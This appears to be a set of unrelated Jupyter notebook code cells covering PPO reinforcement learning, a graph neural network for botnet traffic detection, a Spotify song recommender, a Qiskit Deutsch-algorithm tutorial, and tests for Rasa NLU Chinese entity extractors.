https://github.com/openai/gym/wiki/Leaderboard#lunarlander-v2
•Landing pad is always at coordinates (0,0).
•Coordinates are the first two numbers in state vector.
•Reward for moving from the top of the screen to landing pad and zero speed is about 100..140 points. If lander moves away from landing pad it loses reward back.
•Episode finishes if the lander crashes or comes to rest, receiving additional -100 or +100 points. Each leg ground contact is +10. Firing main engine is -0.3 points each frame. Solved is 200 points. Landing outside landing pad is possible. Fuel is infinite, so an agent can learn to fly and then land on its first attempt.
Four discrete actions available: do nothing, fire left orientation engine, fire main engine, fire right orientation engine.
LunarLander-v2 defines "solving" as getting average reward of 200 over 100 consecutive trials
##description for the continous prob
https://github.com/openai/gym/wiki/Leaderboard#lunarlandercontinuous-v2
•Landing pad is always at coordinates (0,0).
Coordinates are the first two numbers in state vector. Reward for moving from the top of the screen to landing pad and zero speed is about 100..140 points.
If lander moves away from landing pad it loses reward back.
Episode finishes if the lander crashes or comes to rest, receiving additional -100 or +100 points. Each leg ground contact is +10. Firing main engine is -0.3 points each frame. Solved is 200 points. Landing outside landing pad is possible. Fuel is infinite, so an agent can learn to fly and then land on its first attempt.
•Action is two real values vector from -1 to +1. First controls main engine, -1..0 off, 0..+1 throttle from 50% to 100% power. **Engine can't work with less than 50% power (j'espere qu il n a pas implementé qlq chose du genre)**.
• Second value -1.0..-0.5 fire left engine, +0.5..+1.0 fire right engine, -0.5..0.5 off.
#Code
```
import os
try:
import torch
import torch.nn as nn
from torch.distributions import MultivariateNormal
import gym
import numpy as np
from netsapi.challenge import *
except:
!pip3 install git+https://github.com/slremy/netsapi --user --upgrade
!pip install box2d-py
print("restart the kernel and go")
os._exit(0)
# for the KDD-env
from sys import exit, exc_info, argv
from multiprocessing import Pool, current_process
import random as rand
import json
import requests
import numpy as np
import pandas as pd
import statistics
from IPython.display import clear_output
from contextlib import contextmanager
import sys, os
@contextmanager
def suppress_stdout():
with open(os.devnull, "w") as devnull:
old_stdout = sys.stdout
sys.stdout = devnull
try:
yield
finally:
sys.stdout = old_stdout
print("import successful")
import tensorflow as tf
import math
import matplotlib.pyplot as plt
device = "cpu"#torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
def clear_memory(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
```
###nn.Linear https://pytorch.org/docs/stable/_modules/torch/nn/modules/linear.html
Args:
in_features: size of each input sample
out_features: size of each output sample
bias: If set to ``False``, the layer will not learn an additive bias. Default: ``True``
### torch.distributions.multivariate_normal.MultivariateNormal
https://pytorch.org/docs/stable/distributions.html#multivariatenormal
Parameters
loc (Tensor) – mean of the distribution
covariance_matrix (Tensor) – positive-definite covariance matrix
precision_matrix (Tensor) – positive-definite precision matrix
scale_tril (Tensor) – lower-triangular factor of covariance, with positive-valued diagonal
Ex
m = MultivariateNormal(torch.zeros(2), torch.eye(2))
m.sample() # normally distributed with mean=`[0,0]` and covariance_matrix=`I`
```
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim, n_var, action_std):
super(ActorCritic, self).__init__()
# action mean range -1 to 1 #TODO how to change this to [0,1]
self.actor = nn.Sequential(
nn.Linear(state_dim, n_var),
nn.Tanh(),
nn.Linear(n_var, n_var),
nn.Tanh(),
nn.Linear(n_var, action_dim),
nn.Tanh()#todo change this to have something in the [0, 1] interval ***************
)
# critic
self.critic = nn.Sequential( #TODO penser a supp ca since we have alredy a well defined reward
nn.Linear(state_dim, n_var),
nn.Tanh(),
nn.Linear(n_var, n_var),
nn.Tanh(),
nn.Linear(n_var, 1)
)
self.action_var = torch.full((action_dim,), action_std*action_std).to(device) # define the variance of the action taken (gaussian model)
self.action_upper_bound = 1.0 #kim
self.action_lower_bound = 0.0 #kim
def forward(self):
raise NotImplementedError
def act(self, state, memory):
#print("act::state ",state)
type(state)
action_mean = self.actor(state)
#print("action_mean: ", action_mean)
dist = MultivariateNormal(action_mean, torch.diag(self.action_var).to(device)) # Gaussian distrib used by default by PPO
# To get a bounded action space we use Beta distrib:
# beta(4,4) approximate the gaussian well but still need to work on it ++ https://stats.stackexchange.com/questions/317729/is-the-gaussian-distribution-a-specific-case-of-the-beta-distribution
#dist = Beta(torch.tensor([4.0,4.0]), torch.tensor([4.0,4.0])) # https://pytorch.org/docs/stable/distributions.html#beta
# todo transform action_mean, torch.diag(self.action_var).to(device) --> beta param
action = dist.sample()
#print(action)
action = action.tolist()
action = [ (math.tanh(action[0])+1.0)/2.0 , (math.tanh(action[1])+1.0)/2.0 ] #https://pytorch.org/docs/stable/nn.html#tanh
#print(action)
#action+=1
#print(action)
#action/=2.0
#print(action)
action = torch.tensor(action)#this is making me use cpu and not gpu
#print(action)
action_logprob = dist.log_prob(action)
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(action_logprob)
# ++ how to limit my action space to https://github.com/openai/baselines/issues/121
# kim: i will implement this simple sol and hope it works: https://github.com/openai/baselines/issues/121#issuecomment-369688616
# action = np.clip(action, self.action_space.low, self.action_space.high)
# well since it s not a toch obj i will skip this sol XD --> let's use beta distrib (up)
# --> i don t know how to integrate the param of action_mean and action_var into the beta distrib --> go back to upper bound limit
#todo use a wrapper func for this thing ++ https://hub.packtpub.com/openai-gym-environments-wrappers-and-monitors-tutorial/
#action = torch.clamp(action, self.action_lower_bound, self.action_upper_bound, out=None) # https://pytorch.org/docs/master/torch.html?#torch.clamp
#we get a lot of 0 and 1 even if it a good thing but it will not learn in an efficient way since 0 was the mean and we trucate in 0 XD
return action.detach()
def evaluate(self, state, action):
action_mean = self.actor(state)
dist = MultivariateNormal(torch.squeeze(action_mean), torch.diag(self.action_var))
action_logprobs = dist.log_prob(torch.squeeze(action))
dist_entropy = dist.entropy()
state_value = self.critic(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
class PPO:
def __init__(self, state_dim, action_dim, n_latent_var, action_std, lr, betas, gamma, K_epochs, eps_clip):
self.lr = lr
self.betas = betas
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.policy = ActorCritic(state_dim, action_dim, n_latent_var, action_std).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(),
lr=lr, betas=betas)
self.policy_old = ActorCritic(state_dim, action_dim, n_latent_var, action_std).to(device)
self.MseLoss = nn.MSELoss()
def select_action(self, state, memory):
#print("select_action::state ", state)
# state will not be reshaped (1, -1) since we have only one state -.-
state = torch.FloatTensor(state).to(device) # todo probably have to change it to int
#print("select_action:::state ", state)
return self.policy_old.act(state, memory).cpu().data.numpy().flatten()
def update(self, memory):
# Monte Carlo estimate of rewards:
rewards = []
discounted_reward = 0
for reward in reversed(memory.rewards):
discounted_reward = reward + (self.gamma * discounted_reward)
rewards.insert(0, discounted_reward)
# Normalizing the rewards:
rewards = torch.tensor(rewards).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# convert list to tensor
old_states = torch.stack(memory.states).to(device).detach()
old_actions = torch.stack(memory.actions).to(device).detach()
old_logprobs = torch.squeeze(torch.stack(memory.logprobs)).to(device).detach()
# Optimize policy for K epochs:
for _ in range(self.K_epochs):
# Evaluating old actions and values :
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions)
# Finding the ratio (pi_theta / pi_theta__old):
ratios = torch.exp(logprobs - old_logprobs.detach())
# Finding Surrogate Loss:
advantages = rewards - state_values.detach()
surr1 = ratios * advantages
surr2 = torch.clamp(ratios, 1-self.eps_clip, 1+self.eps_clip) * advantages
loss = -torch.min(surr1, surr2) + 0.5*self.MseLoss(state_values, rewards) - 0.01*dist_entropy
# take gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
# Copy new weights into old policy:
self.policy_old.load_state_dict(self.policy.state_dict())
#creating env of KDD (extending gym) https://www.novatec-gmbh.de/en/blog/creating-a-gym-environment/
from gym import error, spaces, utils
from gym.utils import seeding
class KddEnv(gym.Env):
state_dim = 1 # we have only one space dim
action_dim = 2
#metadata = {'render.modes': ['human']}
allRewards = []
def __init__(self):
print("--> init")
self.envSeqDec = ChallengeSeqDecEnvironment() #Initialise a New Challenge Environment to post entire policy
def step(self, action): # one action note hole episode
type(action)
type(action.squeeze().tolist() )
s,r,d,_ = self.envSeqDec.evaluateAction(action.squeeze().tolist())
print("--> action: ",action," s,r,d,_", s," ",r," ",d)
self.allRewards.append(r)
return [s],r,d,_
def reset(self):
print("--> reset")
#self.envSeqDec.reset()
self.envSeqDec = ChallengeSeqDecEnvironment()
return [1]
def render(self, mode='human', close=False):
if len(self.allRewards) % 50 == 5 :
plt.plot(self.allRewards)
#plt.xlim((0,120))
plt.ylim((-100,150))
plt.show()
concat = np.add.reduceat(self.allRewards, np.arange(0, len(self.allRewards), 5))
print(np.max(concat))
def main():
############## Hyperparameters ##############
env_name = "KDD-v2" #"LunarLanderContinuous-v2"
render = True # juste lel affichage bta3 el model (gym)
solved_reward = 200 #200 # stop training if avg_reward > solved_reward
log_interval = 5 #20 # print avg reward in the interval
max_episodes = 2000#20 #50000# max training episodes
max_timesteps = 5 #300 # max timesteps in one episode
n_latent_var = 16 #8 #64 # number of variables in hidden layer
# https://stats.stackexchange.com/a/354476 :
# classic statistical advice to use the number of samples at least 10 times more than the number of parameters. This is vague, of course. If the problem is too noisy, you can demand 100 times more, or 1000 times more.
# we have a max of 100 cases (actions) or in worst case 20 cases (episode)
update_timestep = 5 #4000# update policy every n timesteps ; nthon lezem max_timesteps
action_std = 0.6 # 0.4 #0.6 # constant std for action distribution # je sais pas quoi mettre mais je doit faire une hyperparm opt on it
# my action space is 2 time smaller than the original prob so i devided by sqrt(2)
lr = 0.0025 # learning rate : https://www.freecodecamp.org/news/how-to-pick-the-best-learning-rate-for-your-machine-learning-project-9c28865039a8/
# i will have to run a hyperparm opt on it even if it's the best value
betas = (0.9, 0.999) # est ce que je devrai hyperOpt this or not ??? ++beta
gamma = 0.99 # discount factor # hyperOpt ++
K_epochs = 5 #5 # update policy for K epochs
eps_clip = 0.2 # clip parameter for PPO
random_seed = None
#############################################
# creating environment
env = KddEnv()
if random_seed:
print("Random Seed: {}".format(random_seed))
torch.manual_seed(random_seed)
env.seed(random_seed)
np.random.seed(random_seed)
memory = Memory()
ppo = PPO(env.state_dim, env.action_dim, n_latent_var, action_std, lr, betas, gamma, K_epochs, eps_clip) # this beta have nothing todo with what i'm trying to add
# logging variables
running_reward = 0
old_running_reward = 0
avg_length = 0
time_step = 0
# training loop
for i_episode in range(1, max_episodes+1):
state = env.reset()
for t in range(max_timesteps):
time_step +=1
print("time_step ",time_step )
# Running policy_old:
action = ppo.select_action(state, memory)
state, reward, done, _ = env.step(action)
# Saving reward:
memory.rewards.append(reward)
# update if its time
if time_step % update_timestep == 0:
ppo.update(memory)
memory.clear_memory()
time_step = 0
running_reward += reward
if render:
env.render()
if done:
print("running_reward (tot) when done: ",running_reward - old_running_reward)
old_running_reward = running_reward
break
avg_length += t
# # stop training if avg_reward > solved_reward
if running_reward > (log_interval*solved_reward):
print("########## Solved! ##########")
torch.save(ppo.policy.state_dict(), './PPO_Continuous_{}.pth'.format(env_name))
break
# logging
if i_episode % log_interval == 0:
avg_length = int(avg_length/log_interval)
running_reward = int((running_reward/log_interval))
print('Episode {} \t Avg length: {} \t Avg reward: {}'.format(i_episode, avg_length, running_reward))
running_reward = 0
avg_length = 0
if __name__ == '__main__':
main()
```
| github_jupyter |
```
import dgl.nn as dglnn
from dgl import from_networkx
import torch.nn as nn
import torch as th
import torch.nn.functional as F
import dgl.function as fn
from dgl.data.utils import load_graphs
import networkx as nx
import pandas as pd
import socket
import struct
import random
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
data = pd.read_csv('./bot.csv')
data.drop(columns=['subcategory','pkSeqID','stime','flgs','attack','state','proto','seq'],inplace=True)
data.rename(columns={"category": "label"},inplace = True)
data.label.value_counts()
le = LabelEncoder()
le.fit_transform(data.label.values)
data['label'] = le.transform(data['label'])
data['saddr'] = data.saddr.apply(str)
data['sport'] = data.sport.apply(str)
data['daddr'] = data.daddr.apply(str)
data['dport'] = data.dport.apply(str)
data['saddr'] = data.saddr.apply(lambda x: socket.inet_ntoa(struct.pack('>I', random.randint(0xac100001, 0xac1f0001))))
data['saddr'] = data['saddr'] + ':' + data['sport']
data['daddr'] = data['daddr'] + ':' + data['dport']
data.drop(columns=['sport','dport'],inplace=True)
label_ground_truth = data[["saddr", "daddr","label"]]
data = pd.get_dummies(data, columns = ['flgs_number','state_number', 'proto_number'])
data = data.reset_index()
data.replace([np.inf, -np.inf], np.nan,inplace = True)
data.fillna(0,inplace = True)
label_ground_truth = data[["saddr", "daddr","label"]]
data.drop(columns=['index'],inplace=True)
data
scaler = StandardScaler()
cols_to_norm = list(set(list(data.iloc[:, 2:].columns )) - set(list(['label'])) )
data[cols_to_norm] = scaler.fit_transform(data[cols_to_norm])
X_train, X_test, y_train, y_test = train_test_split(
data, label_ground_truth, test_size=0.3, random_state=42, stratify=label_ground_truth.label)
X_train['h'] = X_train[ cols_to_norm ].values.tolist()
#from dgl.data.utils import load_graphs
#G = load_graphs("./data.bin")[0][0]
G = nx.from_pandas_edgelist(X_train, "saddr", "daddr", ['h','label'], create_using= nx.MultiGraph())
G = G.to_directed()
G = from_networkx(G,edge_attrs=['h','label'])
#from dgl.data.utils import save_graphs
#save_graphs("./data.bin", [G])
G.ndata['h'] = th.ones(G.num_nodes(), G.edata['h'].shape[1])
G.edata['train_mask'] = th.ones(len(G.edata['h']), dtype= th.bool)
#G = load_graphs("./bot_train_G.bin") [0][0]
# Eq1
G.ndata['h'] = th.ones(G.num_nodes(), G.edata['h'].shape[1])
G.edata['train_mask'] = th.ones(len(G.edata['h']), dtype=th.bool)
G.ndata['h'] = th.reshape(G.ndata['h'], (G.ndata['h'].shape[0], 1, G.ndata['h'].shape[1]))
G.edata['h'] = th.reshape(G.edata['h'], (G.edata['h'].shape[0], 1, G.edata['h'].shape[1]))
class MLPPredictor(nn.Module):
def __init__(self, in_features, out_classes):
super().__init__()
self.W = nn.Linear(in_features * 2, out_classes)
def apply_edges(self, edges):
h_u = edges.src['h']
h_v = edges.dst['h']
score = self.W(th.cat([h_u, h_v], 1))
return {'score': score}
def forward(self, graph, h):
with graph.local_scope():
graph.ndata['h'] = h
graph.apply_edges(self.apply_edges)
return graph.edata['score']
G.ndata['h'].shape
def compute_accuracy(pred, labels):
return (pred.argmax(1) == labels).float().mean().item()
class SAGELayer(nn.Module):
def __init__(self, ndim_in, edims, ndim_out, activation):
super(SAGELayer, self).__init__()
### force to outut fix dimensions
self.W_msg = nn.Linear(ndim_in + edims, ndim_out)
### apply weight
self.W_apply = nn.Linear(ndim_in + ndim_out, ndim_out)
self.activation = activation
def message_func(self, edges):
return {'m': self.W_msg(th.cat([edges.src['h'], edges.data['h']], 2))}
def forward(self, g_dgl, nfeats, efeats):
with g_dgl.local_scope():
g = g_dgl
g.ndata['h'] = nfeats
g.edata['h'] = efeats
# Eq4
g.update_all(self.message_func, fn.mean('m', 'h_neigh'))
# Eq5
g.ndata['h'] = F.relu(self.W_apply(th.cat([g.ndata['h'], g.ndata['h_neigh']], 2)))
return g.ndata['h']
class SAGE(nn.Module):
def __init__(self, ndim_in, ndim_out, edim, activation, dropout):
super(SAGE, self).__init__()
self.layers = nn.ModuleList()
self.layers.append(SAGELayer(ndim_in, edim, 128, activation))
self.layers.append(SAGELayer(128, edim, ndim_out, activation))
self.dropout = nn.Dropout(p=dropout)
def forward(self, g, nfeats, efeats):
for i, layer in enumerate(self.layers):
if i != 0:
nfeats = self.dropout(nfeats)
nfeats = layer(g, nfeats, efeats)
return nfeats.sum(1)
class Model(nn.Module):
def __init__(self, ndim_in, ndim_out, edim, activation, dropout):
super().__init__()
self.gnn = SAGE(ndim_in, ndim_out, edim, activation, dropout)
self.pred = MLPPredictor(ndim_out, 5)
def forward(self, g, nfeats, efeats):
h = self.gnn(g, nfeats, efeats)
return self.pred(g, h)
from sklearn.utils import class_weight
class_weights = class_weight.compute_class_weight('balanced',
np.unique(G.edata['label'].cpu().numpy()),
G.edata['label'].cpu().numpy())
class_weights = th.FloatTensor(class_weights).cuda()
criterion = nn.CrossEntropyLoss(weight = class_weights)
G = G.to('cuda:0')
G.device
G.ndata['h'].device
G.edata['h'].device
# node_features = G.ndata['h']
# edge_features = G.edata['h']
# edge_label = G.edata['label']
# train_mask = G.edata['train_mask']
# model = Model(G.ndata['h'].shape[2], 128, G.ndata['h'].shape[2], F.relu, 0.2).cuda()
# opt = th.optim.Adam(model.parameters())
# for epoch in range(1,14500):
# pred = model(G, node_features,edge_features).cuda()
# loss = criterion(pred[train_mask] ,edge_label[train_mask])
# opt.zero_grad()
# loss.backward()
# opt.step()
# if epoch % 100 == 0:
# print('Epoch:', epoch ,' Training acc:', compute_accuracy(pred[train_mask], edge_label[train_mask]))
X_test['h'] = X_test[ cols_to_norm ].values.tolist()
#G_test = load_graphs("bot_test_G.bin") [0][0]
G_test = nx.from_pandas_edgelist(X_test, "saddr", "daddr", ['h','label'],create_using=nx.MultiGraph())
G_test = G_test.to_directed()
G_test = from_networkx(G_test,edge_attrs=['h','label'] )
actual = G_test.edata.pop('label')
G_test.ndata['feature'] = th.ones(G_test.num_nodes(), 55)
G_test.ndata['feature'] = th.reshape(G_test.ndata['feature'], (G_test.ndata['feature'].shape[0], 1, G_test.ndata['feature'].shape[1]))
G_test.edata['h'] = th.reshape(G_test.edata['h'], (G_test.edata['h'].shape[0], 1, G_test.edata['h'].shape[1]))
G_test = G_test.to('cuda:0')
th.cuda.empty_cache()
import timeit
start_time = timeit.default_timer()
node_features_test = G_test.ndata['feature']
edge_features_test = G_test.edata['h']
test_pred = model(G_test, node_features_test, edge_features_test).cuda()
elapsed = timeit.default_timer() - start_time
print(str(elapsed) + ' seconds')
test_pred = test_pred.argmax(1)
test_pred = th.Tensor.cpu(test_pred).detach().numpy()
edge_label = le.inverse_transform(actual)
test_pred = le.inverse_transform(test_pred)
def plot_confusion_matrix(cm,
target_names,
title='Confusion matrix',
cmap=None,
normalize=True):
import matplotlib.pyplot as plt
import numpy as np
import itertools
accuracy = np.trace(cm) / float(np.sum(cm))
misclass = 1 - accuracy
if cmap is None:
cmap = plt.get_cmap('Blues')
plt.figure(figsize=(12, 12))
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
if target_names is not None:
tick_marks = np.arange(len(target_names))
plt.xticks(tick_marks, target_names, rotation=45)
plt.yticks(tick_marks, target_names)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
thresh = cm.max() / 1.5 if normalize else cm.max() / 2
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
if normalize:
plt.text(j, i, "{:0.4f}".format(cm[i, j]),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
else:
plt.text(j, i, "{:,}".format(cm[i, j]),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))
plt.show()
from sklearn.metrics import confusion_matrix
plot_confusion_matrix(cm = confusion_matrix(edge_label, test_pred),
normalize = False,
target_names = np.unique(edge_label),
title = "Confusion Matrix")
```
| github_jupyter |
# Imports and Installs
```
# Imports
import pandas as pd
import numpy as np
import pandas_profiling
from sklearn import preprocessing # for category encoder
from sklearn.neighbors import NearestNeighbors
from sklearn.model_selection import train_test_split
# much more efficient for larger files like Nearest Neighbors which the model
import joblib
# Read in data
df = pd.read_csv('https://raw.githubusercontent.com/aguilargallardo/DS-Unit-2-Applied-Modeling/master/data/SpotifyFeatures.csv')
df = df.dropna() # drop null values
df.shape
```
## Neural Network
#### Preprocessing
```
time_sig_encoding = { '0/4' : 0, '1/4' : 1,
'3/4' : 3, '4/4' : 4,
'5/4' : 5}
key_encoding = { 'A' : 0, 'A#' : 1, 'B' : 2,
'C' : 3, 'C#' : 4, 'D' : 5,
'D#' : 6, 'E' : 7, 'F' : 8,
'F#' : 9, 'G' : 10, ' G#' : 11 }
mode_encoding = { 'Major':0, 'Minor':1}
df['key'] = df['key'].map(key_encoding)
df['time_signature'] = df['time_signature'].map(time_sig_encoding)
df['mode'] = df['mode'].map(mode_encoding)
# helper function to one hot encode genre
def encode_and_bind(original_dataframe, feature_to_encode):
dummies = pd.get_dummies(original_dataframe[[feature_to_encode]])
res = pd.concat([original_dataframe, dummies], axis=1)
return(res)
df = encode_and_bind(df, 'genre')
df = df.dropna() # drop null values again not sure why it created null values
# check worked out
df.dtypes
```
# MODELING: Nearest Neighbors
resources: https://scikit-learn.org/stable/modules/neighbors.html
```
neigh = NearestNeighbors()
# to remove the transformed columns from model
remove = ['key', 'mode','time_signature']
features = [i for i in list(df.columns[4:]) if i not in remove]
# target = 'track_id'
X = df[features]
# y = df[target]
X.shape, #y.shape
neigh.fit(X) # NN doesn't need to fit Y
```
### Autoencoder
```
from tensorflow.keras.layers import Input, Dense
from tensorflow.keras.models import Model
encoding_dim = 32 # 32 floats -> compression of factor 24.5, assuming the input is 784 floats
from sklearn.neighbors import NearestNeighbors
nn = NearestNeighbors(n_neighbors=10, algorithm='ball_tree')
nn.fit(encoded_imgs)
```
#### Nicole's Imported Model
```
# K nearest neighbors NN https://www.reddit.com/r/MachineLearning/comments/2f8jff/using_neural_networks_for_nearest_neighbor/
import numpy as np
# feed foward neural network, multi-lauyer perceptron
np.random.seed(812)
# input layer- 3 inputs: hours studying, hours sleep
X = np.array(([0,0,1],
[0,1,1],
[1,0,1],
[0,1,0],
[1,0,0],
[1,1,1],
[0,0,0]), dtype=float)
# Exam Scores
y = np.array(([0],
[1],
[1],
[1],
[1],
[0],
[0],
[0]), dtype=float)
# Feature normalization
# Normalizing Data on feature (because or model will train faster)
# Neural Network would probably do this on its own, but it will help us converge on a solution faster
X = X / np.amax(X, axis=0)
y = y / 100
print("Studying, Sleeping \n", X)
print("Test Score \n", y)
# neural network class for function (REVIEW THIS CELL)
class NeuralNetwork:
def __init__(self):
# Set up Architecture of Neural Network
self.inputs = 3
self.hiddenNodes = 4
self.outputNodes = 1
# Initial Weights
# 3x7 Matrix Array for the First Layer: inputs to hidden
self.weights1 = np.random.rand(self.inputs, self.hiddenNodes)
# 7x1 Matrix Array for Hidden to Output
self.weights2 = np.random.rand(self.hiddenNodes, self.outputNodes)
```
# Export Model with Joblib
```
filename = 'NearestNeighbor.sav'
joblib.dump(neigh, filename)
```
| github_jupyter |
<img src="classical_gates.png" />
```
%matplotlib inline
# Importing standard Qiskit libraries
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister, execute, BasicAer
from qiskit.tools.jupyter import *
from qiskit.visualization import *
qr = QuantumRegister(2, 'qubit')
cr = ClassicalRegister(2, name="bit")
circuit = QuantumCircuit(qr, cr)
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.measure(qr, cr)
circuit.draw('mpl', initial_state=True)
# Load simulator
local_simulator = BasicAer.get_backend('qasm_simulator')
job = execute(circuit, backend=local_simulator, shots=1000)
print(job.result().get_counts())
plot_histogram(job.result().get_counts())
```
# Deutsch Algorithm
<table>
<tbody>
<tr>
<td colspan="2"><img src="deutsch_problem.png" /></td>
</tr>
<tr>
<td><img src="classic_oracle.png" /></td>
<td><img src="quantum_oracle.png" /></td>
</tr>
</tbody>
</table>
## Oracle 4: Constant zero
```
input = QuantumRegister(1, name='input')
output = QuantumRegister(1, name='output')
constant0 = QuantumCircuit(input, output, name='oracle')
oracle4 = constant0.to_instruction()
constant0.draw('mpl', initial_state=True)
```
## Oracle 3: Constant one
```
input = QuantumRegister(1, name='input')
temp = QuantumRegister(1, name='output')
constant1 = QuantumCircuit(input, temp, name='oracle')
constant1.x(temp)
oracle3 = constant1.to_instruction()
constant1.draw('mpl', initial_state=True)
```
## Oracle 1: Identity
```
input = QuantumRegister(1, name='input')
temp = QuantumRegister(1, name='output')
identity = QuantumCircuit(input, temp, name='oracle')
identity.cx(input, temp)
oracle1 = identity.to_instruction()
identity.draw('mpl', initial_state=True)
```
## Oracle 2: Invert
```
input = QuantumRegister(1, name='input')
output = QuantumRegister(1, name='output')
invert = QuantumCircuit(input, output, name='oracle')
invert.cx(input, output)
invert.x(output)
oracle2 = identity.to_instruction()
invert.draw('mpl', initial_state=True)
# footnote on alternative ways to write classical functions as quantum circuits
from qiskit.circuit import classical_function
from qiskit.circuit import Int1
@classical_function
def alt_invert(input: Int1) -> Int1:
return not input
invert_gate = alt_invert.synth(registerless=False)
display(invert_gate.draw('mpl', initial_state=True))
invert_gate.decompose().draw('mpl', initial_state=True)
```
## Run an oracle
```
result = ClassicalRegister(1, name='result')
circuit = QuantumCircuit(input, output, result)
circuit.x(input) # <- set input to 1
circuit.barrier()
circuit += invert # options: identity, invert, constant1, constant0
circuit.barrier()
circuit.measure(output, result)
circuit.draw('mpl', initial_state=True)
job = execute(circuit, backend=local_simulator, shots=1000)
print(job.result().get_counts())
```
## Running Deutsch's Algorithm
```
qr = QuantumRegister(2, name='qubits')
cr = ClassicalRegister(1, name='result')
circuit = QuantumCircuit(qr, cr)
circuit.x(qr[1])
circuit.h(qr)
circuit.append(oracle2, [qr[0], qr[1]]) # <--- oracle!
circuit.h(qr[0])
circuit.measure(qr[0], cr[0]);
circuit.draw('mpl', initial_state=True, justify='right')
counts = execute(circuit, backend=local_simulator, shots=1).result().get_counts()
# ^
counts['BALANCED'] = counts.pop('1', None)
counts['CONSTANT'] = counts.pop('0', None)
print(counts)
```
# Real device!
```
import qiskit.tools.jupyter
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
provider = IBMQ.load_account()
least_busy_device = least_busy(provider.backends(simulator=False, filters=lambda b: b.configuration().n_qubits >= 2))
least_busy_device
job = execute(circuit, backend=least_busy_device, shots=1000)
print(job.status())
job.wait_for_final_state()
print(job.status())
counts = job.result().get_counts()
counts = job.result().get_counts()
print(counts)
counts['BALANCED'] = counts.pop('1', None)
counts['CONSTANT'] = counts.pop('0', None)
print(counts)
```
| github_jupyter |
```
import logging
import os
import pytest
from rasa_nlu import data_router, config
from rasa_nlu.components import ComponentBuilder
from rasa_nlu.model import Trainer
from rasa_nlu.utils import zip_folder
from rasa_nlu import training_data
from sagas.provider.hanlp_utils import Hanlp
# logging.basicConfig(level="DEBUG")
logging.basicConfig(level="INFO")
CONFIG_DEFAULTS_PATH = "sample_configs/config_defaults.yml"
DEFAULT_DATA_PATH = "data/examples/rasa/demo-rasa.json"
TEST_MODEL_PATH = "test_models/test_model_spacy_sklearn"
def component_builder():
return ComponentBuilder()
def hanlp(component_builder, default_config):
return component_builder.create_component("sagas.provider.hanlp_utils.Hanlp", default_config)
def timenlp(component_builder, default_config):
return component_builder.create_component("sagas.provider.time_extractor.TimeExtractor", default_config)
def default_config():
return config.load(CONFIG_DEFAULTS_PATH)
# component_classes = [Hanlp]
# registered_components = {c.name: c for c in component_classes}
hanlp=hanlp(component_builder(), default_config())
timenlp=timenlp(component_builder(), default_config())
import sagas.provider.hanlp_entity_extractor
import imp
imp.reload(sagas.provider.hanlp_entity_extractor)
from rasa_nlu.config import RasaNLUModelConfig
from rasa_nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
from rasa_nlu.training_data import TrainingData, Message
from sagas.provider.hanlp_entity_extractor import HanlpEntityExtractor
def test_hanlp_ner_extractor(text, hanlp, hanlp_doc):
ext = HanlpEntityExtractor()
example = Message(text, {
"intent": "wish",
"entities": [],
"hanlp_doc": hanlp_doc})
ext.process(example, hanlp=hanlp.nlp)
print("total entities", len(example.get("entities", [])))
for ent in example.get("entities"):
print(ent)
text="我的希望是希望张晚霞的背影被晚霞映红"
test_hanlp_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
text="蓝翔给宁夏固原市彭阳县红河镇黑牛沟村捐赠了挖掘机"
test_hanlp_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
from sagas.provider.amount_extractor import AmountExtractor
def test_amount_ner_extractor(text, hanlp, hanlp_doc):
ext = AmountExtractor()
example = Message(text, {
"intent": "wish",
"entities": [],
"hanlp_doc": hanlp_doc})
ext.process(example, hanlp=hanlp.nlp)
print("total entities", len(example.get("entities", [])))
for ent in example.get("entities"):
print(ent)
text="十九元套餐包括什么"
test_amount_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
text="牛奶三〇〇克*2"
test_amount_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
from sagas.provider.hanlp_tokenizer import HanlpTokenizer
def test_hanlp_tokenizer(text, hanlp, hanlp_doc):
ext = HanlpTokenizer()
example = Message(text, {
"intent": "wish",
"entities": [],
"hanlp_doc": hanlp_doc})
ext.process(example, hanlp=hanlp)
for token in example.get("tokens"):
print(token.text, token.offset)
# text="我的希望是希望张晚霞的背影被晚霞映红"
text="我想去吃兰州拉面"
test_hanlp_tokenizer(text, hanlp, hanlp.doc_for_text(text))
import sagas.provider.time_extractor
import imp
imp.reload(sagas.provider.time_extractor)
from rasa_nlu.config import RasaNLUModelConfig
from rasa_nlu.training_data import TrainingData, Message
CONFIG_ZH_PATH = "sample_configs/config_zh.yml"
def test_time_entity_extractor(component_builder):
# _config = RasaNLUModelConfig({"pipeline": [{"name": "sagas.provider.time_extractor.TimeExtractor"}]})
# _config.set_component_attr("ner_time", dimensions=["time"], host="unknown")
_config=config.load(CONFIG_ZH_PATH)
c = component_builder.create_component("sagas.provider.time_extractor.TimeExtractor", _config)
message = Message("周五下午7点到8点")
c.process(message)
entities = message.get("entities")
print("total entities", len(entities))
